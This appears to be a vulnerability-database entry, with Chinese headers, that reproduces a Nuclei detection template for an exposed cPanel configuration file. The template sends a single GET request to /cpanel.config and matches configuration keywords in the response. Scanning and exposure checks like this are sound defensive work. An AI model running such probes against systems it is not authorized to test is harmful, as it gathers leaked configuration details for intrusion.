cpanel-config: cPanel Configuration - File Disclosure

日期: 2025-08-01 | 影响软件: cpanel-config | POC: 已公开

漏洞描述

cPanel configuration file is exposed and accessible, potentially leading to sensitive information disclosure.

PoC代码[已公开]

id: cpanel-config

info:
  name: cPanel Configuration - File Disclosure
  author: DhiyaneshDk
  severity: medium
  description: |
    cPanel configuration file is exposed and accessible, potentially leading to sensitive information disclosure.
  metadata:
    verified: true
    max-request: 1
  tags: cpanel,config,exposure,discovery

http:
  - method: GET
    path:
      - "{{BaseURL}}/cpanel.config"

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'configuration','user','access_log=')"
          - "status_code == 200"
        condition: and
# digest: 490a00463044022046724c024398442587ee3f74b077fbc14d4446eb8d2e361d7fa0a3714bb858d802205db9a89ac68bb9848f5e6eed930e6b4d508b9654295057a4d0c71cc2f2a98736:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/exposures/configs/cpanel-config.yaml